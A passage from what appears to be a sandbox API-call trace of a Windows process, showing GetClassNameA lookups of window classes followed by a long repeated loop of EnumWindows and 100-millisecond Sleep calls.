(in: hWnd=0x1010a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.873] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.873] GetClassNameA (in: hWnd=0x10108, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.873] GetClassNameA (in: hWnd=0x10104, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.873] GetClassNameA (in: hWnd=0x10102, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0145.873] GetClassNameA (in: hWnd=0x10100, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.874] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0145.874] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0145.874] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x1036fd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0145.874] Sleep (dwMilliseconds=0x64) [0145.976] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0145.976] Sleep (dwMilliseconds=0x64) [0146.129] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0146.130] Sleep (dwMilliseconds=0x64) [0146.271] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0146.272] Sleep (dwMilliseconds=0x64) [0146.389] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0146.389] Sleep (dwMilliseconds=0x64) [0146.524] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0146.525] Sleep (dwMilliseconds=0x64) [0146.649] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0146.649] Sleep (dwMilliseconds=0x64) [0146.821] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0146.821] Sleep (dwMilliseconds=0x64) [0146.975] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0146.975] Sleep (dwMilliseconds=0x64) [0147.094] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0147.094] Sleep (dwMilliseconds=0x64) [0147.225] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0147.226] Sleep (dwMilliseconds=0x64) [0147.367] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0147.367] Sleep (dwMilliseconds=0x64) [0147.501] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0147.501] Sleep (dwMilliseconds=0x64) [0147.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0147.603] Sleep (dwMilliseconds=0x64) [0147.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0147.744] Sleep (dwMilliseconds=0x64) [0147.853] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0147.853] Sleep (dwMilliseconds=0x64) [0148.052] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0148.052] Sleep (dwMilliseconds=0x64) [0148.154] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0148.154] Sleep (dwMilliseconds=0x64) [0148.370] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0148.371] Sleep (dwMilliseconds=0x64) [0148.501] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0148.501] Sleep (dwMilliseconds=0x64) [0148.670] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0148.670] Sleep (dwMilliseconds=0x64) [0148.776] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0148.777] Sleep (dwMilliseconds=0x64) [0148.927] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0148.927] Sleep (dwMilliseconds=0x64) [0149.046] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0149.046] Sleep (dwMilliseconds=0x64) [0149.148] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0149.149] Sleep (dwMilliseconds=0x64) [0149.310] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0149.310] Sleep (dwMilliseconds=0x64) [0149.503] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0149.503] Sleep (dwMilliseconds=0x64) [0149.717] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0149.761] Sleep (dwMilliseconds=0x64) [0149.895] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0149.895] Sleep (dwMilliseconds=0x64) [0150.063] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0150.063] Sleep (dwMilliseconds=0x64) [0150.190] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0150.191] Sleep (dwMilliseconds=0x64) [0150.359] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0150.360] Sleep (dwMilliseconds=0x64) [0150.510] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0150.510] Sleep (dwMilliseconds=0x64) [0150.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0150.726] Sleep (dwMilliseconds=0x64) [0150.842] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0150.842] Sleep (dwMilliseconds=0x64) [0150.963] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0150.963] Sleep (dwMilliseconds=0x64) [0151.153] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0151.153] Sleep (dwMilliseconds=0x64) [0151.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0151.297] Sleep (dwMilliseconds=0x64) [0151.646] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0151.646] Sleep (dwMilliseconds=0x64) [0151.774] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0151.775] Sleep (dwMilliseconds=0x64) [0151.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0151.953] Sleep (dwMilliseconds=0x64) [0152.076] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0152.076] Sleep (dwMilliseconds=0x64) [0152.259] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0152.259] Sleep (dwMilliseconds=0x64) [0152.386] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0152.387] Sleep (dwMilliseconds=0x64) [0152.536] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0152.536] Sleep (dwMilliseconds=0x64) [0152.648] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0152.648] Sleep (dwMilliseconds=0x64) [0152.968] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0152.969] Sleep (dwMilliseconds=0x64) [0153.087] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0153.087] Sleep (dwMilliseconds=0x64) [0153.216] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0153.217] Sleep (dwMilliseconds=0x64) [0153.336] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0153.336] Sleep (dwMilliseconds=0x64) [0153.504] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0153.505] Sleep (dwMilliseconds=0x64) [0153.620] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0153.620] Sleep (dwMilliseconds=0x64) [0153.745] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0153.745] Sleep (dwMilliseconds=0x64) [0153.943] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0153.943] Sleep (dwMilliseconds=0x64) [0154.257] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0154.258] Sleep (dwMilliseconds=0x64) [0154.371] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0154.372] Sleep (dwMilliseconds=0x64) [0154.482] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0154.482] Sleep (dwMilliseconds=0x64) [0154.668] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0154.668] Sleep (dwMilliseconds=0x64) [0154.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0154.790] Sleep (dwMilliseconds=0x64) [0154.949] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0154.950] Sleep (dwMilliseconds=0x64) [0155.098] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0155.098] Sleep (dwMilliseconds=0x64) [0155.318] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0155.343] Sleep (dwMilliseconds=0x64) [0155.468] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0155.468] Sleep (dwMilliseconds=0x64) [0155.667] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0155.667] Sleep (dwMilliseconds=0x64) [0155.770] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0155.770] Sleep (dwMilliseconds=0x64) [0156.008] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0156.009] Sleep (dwMilliseconds=0x64) [0156.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0156.123] Sleep (dwMilliseconds=0x64) [0156.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0156.238] Sleep (dwMilliseconds=0x64) [0156.342] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0156.342] Sleep (dwMilliseconds=0x64) [0156.534] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0156.534] Sleep (dwMilliseconds=0x64) [0156.704] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0156.705] Sleep (dwMilliseconds=0x64) [0156.811] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0156.811] Sleep (dwMilliseconds=0x64) [0157.017] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0157.018] Sleep (dwMilliseconds=0x64) [0157.134] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0157.134] Sleep (dwMilliseconds=0x64) [0157.254] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0157.255] Sleep (dwMilliseconds=0x64) [0157.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0157.357] Sleep (dwMilliseconds=0x64) [0157.552] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0157.552] Sleep (dwMilliseconds=0x64) [0157.676] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0157.677] Sleep (dwMilliseconds=0x64) [0157.812] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0157.812] Sleep (dwMilliseconds=0x64) [0157.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0157.923] Sleep (dwMilliseconds=0x64) [0158.099] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0158.099] Sleep (dwMilliseconds=0x64) [0158.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0158.238] Sleep (dwMilliseconds=0x64) [0158.341] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0158.342] Sleep (dwMilliseconds=0x64) [0158.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0158.508] Sleep (dwMilliseconds=0x64) [0158.668] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0158.668] Sleep (dwMilliseconds=0x64) [0158.787] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0158.788] Sleep (dwMilliseconds=0x64) [0159.011] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0159.011] Sleep (dwMilliseconds=0x64) [0159.185] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0159.185] Sleep (dwMilliseconds=0x64) [0159.380] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0159.381] Sleep (dwMilliseconds=0x64) [0159.491] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0159.491] Sleep (dwMilliseconds=0x64) [0159.604] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0159.604] Sleep (dwMilliseconds=0x64) [0159.983] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0159.983] Sleep (dwMilliseconds=0x64) [0160.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0160.415] Sleep (dwMilliseconds=0x64) [0160.534] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0160.534] Sleep (dwMilliseconds=0x64) [0160.644] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0160.645] Sleep (dwMilliseconds=0x64) [0160.802] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0160.802] Sleep (dwMilliseconds=0x64) [0160.957] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0160.957] Sleep (dwMilliseconds=0x64) [0161.083] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0161.083] Sleep (dwMilliseconds=0x64) [0161.185] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0161.185] Sleep (dwMilliseconds=0x64) [0161.345] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0161.345] Sleep (dwMilliseconds=0x64) [0161.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0161.532] Sleep (dwMilliseconds=0x64) [0161.645] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0161.645] Sleep (dwMilliseconds=0x64) [0161.752] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0161.752] Sleep (dwMilliseconds=0x64) [0161.922] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0161.922] Sleep (dwMilliseconds=0x64) [0162.055] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0162.055] Sleep (dwMilliseconds=0x64) [0162.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0162.168] Sleep (dwMilliseconds=0x64) [0162.307] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0162.307] Sleep (dwMilliseconds=0x64) [0162.492] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0162.492] Sleep (dwMilliseconds=0x64) [0162.627] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0162.627] Sleep (dwMilliseconds=0x64) [0162.729] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0162.729] Sleep (dwMilliseconds=0x64) [0162.914] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0162.915] Sleep (dwMilliseconds=0x64) [0163.068] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0163.068] Sleep (dwMilliseconds=0x64) [0163.228] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0163.228] Sleep (dwMilliseconds=0x64) [0163.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0163.335] Sleep (dwMilliseconds=0x64) [0163.538] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0163.538] Sleep (dwMilliseconds=0x64) [0163.749] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0163.749] Sleep (dwMilliseconds=0x64) [0163.869] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0163.869] Sleep (dwMilliseconds=0x64) [0163.985] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0163.985] Sleep (dwMilliseconds=0x64) [0164.145] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0164.145] Sleep (dwMilliseconds=0x64) [0164.295] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0164.295] Sleep (dwMilliseconds=0x64) [0164.421] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0164.421] Sleep (dwMilliseconds=0x64) [0164.555] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0164.555] Sleep (dwMilliseconds=0x64) [0164.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0164.705] Sleep (dwMilliseconds=0x64) [0164.828] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0164.828] Sleep (dwMilliseconds=0x64) [0165.006] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0165.007] Sleep (dwMilliseconds=0x64) [0165.115] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0165.115] Sleep (dwMilliseconds=0x64) [0165.292] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0165.292] Sleep (dwMilliseconds=0x64) [0165.404] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0165.404] Sleep (dwMilliseconds=0x64) [0165.532] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0165.532] Sleep (dwMilliseconds=0x64) [0165.696] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0165.696] Sleep (dwMilliseconds=0x64) [0165.844] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0165.844] Sleep (dwMilliseconds=0x64) [0165.974] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0165.974] Sleep (dwMilliseconds=0x64) [0166.085] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0166.085] Sleep (dwMilliseconds=0x64) [0166.273] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0166.273] Sleep (dwMilliseconds=0x64) [0166.425] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0166.425] Sleep (dwMilliseconds=0x64) [0166.552] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0166.552] Sleep (dwMilliseconds=0x64) [0166.660] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0166.660] Sleep (dwMilliseconds=0x64) [0166.851] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0166.851] Sleep (dwMilliseconds=0x64) [0166.991] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0166.992] Sleep (dwMilliseconds=0x64) [0167.096] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0167.096] Sleep (dwMilliseconds=0x64) [0167.301] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0167.302] Sleep (dwMilliseconds=0x64) [0167.425] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0167.426] Sleep (dwMilliseconds=0x64) [0167.528] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0167.529] Sleep (dwMilliseconds=0x64) [0167.656] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0167.657] Sleep (dwMilliseconds=0x64) [0167.802] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0167.803] Sleep (dwMilliseconds=0x64) [0167.984] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0167.985] Sleep (dwMilliseconds=0x64) [0168.155] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0168.155] Sleep (dwMilliseconds=0x64) [0168.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0168.298] Sleep (dwMilliseconds=0x64) [0168.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0168.455] Sleep (dwMilliseconds=0x64) [0168.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0168.640] Sleep (dwMilliseconds=0x64) [0168.763] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0168.763] Sleep (dwMilliseconds=0x64) [0168.865] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0168.865] Sleep (dwMilliseconds=0x64) [0169.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0169.013] Sleep (dwMilliseconds=0x64) [0169.179] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0169.179] Sleep (dwMilliseconds=0x64) [0169.342] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0169.343] Sleep (dwMilliseconds=0x64) [0169.478] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0169.478] Sleep (dwMilliseconds=0x64) [0169.594] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0169.595] Sleep (dwMilliseconds=0x64) [0169.860] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0169.861] Sleep (dwMilliseconds=0x64) [0170.041] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0170.042] Sleep (dwMilliseconds=0x64) [0170.167] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0170.167] Sleep (dwMilliseconds=0x64) [0170.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0170.297] Sleep (dwMilliseconds=0x64) [0170.463] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0170.464] Sleep (dwMilliseconds=0x64) [0170.579] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0170.580] Sleep (dwMilliseconds=0x64) [0170.684] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0170.684] Sleep (dwMilliseconds=0x64) [0170.833] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0170.834] Sleep (dwMilliseconds=0x64) [0171.000] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0171.000] Sleep (dwMilliseconds=0x64) [0171.129] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0171.129] Sleep (dwMilliseconds=0x64) [0171.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0171.239] Sleep (dwMilliseconds=0x64) [0171.397] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0171.397] Sleep (dwMilliseconds=0x64) [0171.610] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0171.610] Sleep (dwMilliseconds=0x64) [0171.720] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0171.720] Sleep (dwMilliseconds=0x64) [0171.858] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0171.859] Sleep (dwMilliseconds=0x64) [0172.039] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0172.040] Sleep (dwMilliseconds=0x64) [0172.170] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0172.171] Sleep (dwMilliseconds=0x64) [0172.308] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0172.309] Sleep (dwMilliseconds=0x64) [0172.410] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0172.410] Sleep (dwMilliseconds=0x64) [0172.574] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0172.575] Sleep (dwMilliseconds=0x64) [0172.745] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0172.747] Sleep (dwMilliseconds=0x64) [0172.866] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0172.866] Sleep (dwMilliseconds=0x64) [0172.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0172.971] Sleep (dwMilliseconds=0x64) [0173.146] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0173.147] Sleep (dwMilliseconds=0x64) [0173.385] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0173.385] Sleep (dwMilliseconds=0x64) [0173.509] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0173.509] Sleep (dwMilliseconds=0x64) [0173.619] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0173.619] Sleep (dwMilliseconds=0x64) [0173.775] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0173.776] Sleep (dwMilliseconds=0x64) [0173.960] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0173.961] Sleep (dwMilliseconds=0x64) [0174.087] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0174.087] Sleep (dwMilliseconds=0x64) [0174.192] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0174.193] Sleep (dwMilliseconds=0x64) [0174.348] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0174.348] Sleep (dwMilliseconds=0x64) [0174.539] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0174.540] Sleep (dwMilliseconds=0x64) [0174.658] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0174.659] Sleep (dwMilliseconds=0x64) [0174.769] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0174.769] Sleep (dwMilliseconds=0x64) [0174.913] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0174.913] Sleep (dwMilliseconds=0x64) [0175.082] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.083] Sleep (dwMilliseconds=0x64) [0175.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.218] Sleep (dwMilliseconds=0x64) [0175.323] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.323] Sleep (dwMilliseconds=0x64) [0175.505] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.505] Sleep (dwMilliseconds=0x64) [0175.629] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.629] Sleep (dwMilliseconds=0x64) [0175.767] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.767] Sleep (dwMilliseconds=0x64) [0175.882] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.882] Sleep (dwMilliseconds=0x64) [0175.894] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.894] Sleep (dwMilliseconds=0x64) [0175.901] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.902] Sleep (dwMilliseconds=0x64) [0175.905] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.905] Sleep (dwMilliseconds=0x64) [0175.908] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.908] Sleep (dwMilliseconds=0x64) [0175.942] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.942] Sleep (dwMilliseconds=0x64) [0175.964] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0175.965] Sleep (dwMilliseconds=0x64) [0176.000] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.000] Sleep (dwMilliseconds=0x64) [0176.076] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.076] Sleep (dwMilliseconds=0x64) [0176.179] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.180] Sleep (dwMilliseconds=0x64) [0176.290] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.290] Sleep (dwMilliseconds=0x64) [0176.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.332] Sleep (dwMilliseconds=0x64) [0176.375] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.375] Sleep (dwMilliseconds=0x64) [0176.414] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.415] Sleep (dwMilliseconds=0x64) [0176.459] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.459] Sleep (dwMilliseconds=0x64) [0176.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.489] Sleep (dwMilliseconds=0x64) [0176.492] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.492] Sleep (dwMilliseconds=0x64) [0176.496] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.498] Sleep (dwMilliseconds=0x64) [0176.504] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.504] Sleep (dwMilliseconds=0x64) [0176.510] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.510] Sleep (dwMilliseconds=0x64) [0176.514] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.514] Sleep (dwMilliseconds=0x64) [0176.518] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.518] Sleep (dwMilliseconds=0x64) [0176.521] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.521] Sleep (dwMilliseconds=0x64) [0176.536] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.536] Sleep (dwMilliseconds=0x64) [0176.541] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.541] Sleep (dwMilliseconds=0x64) [0176.549] EnumWindows 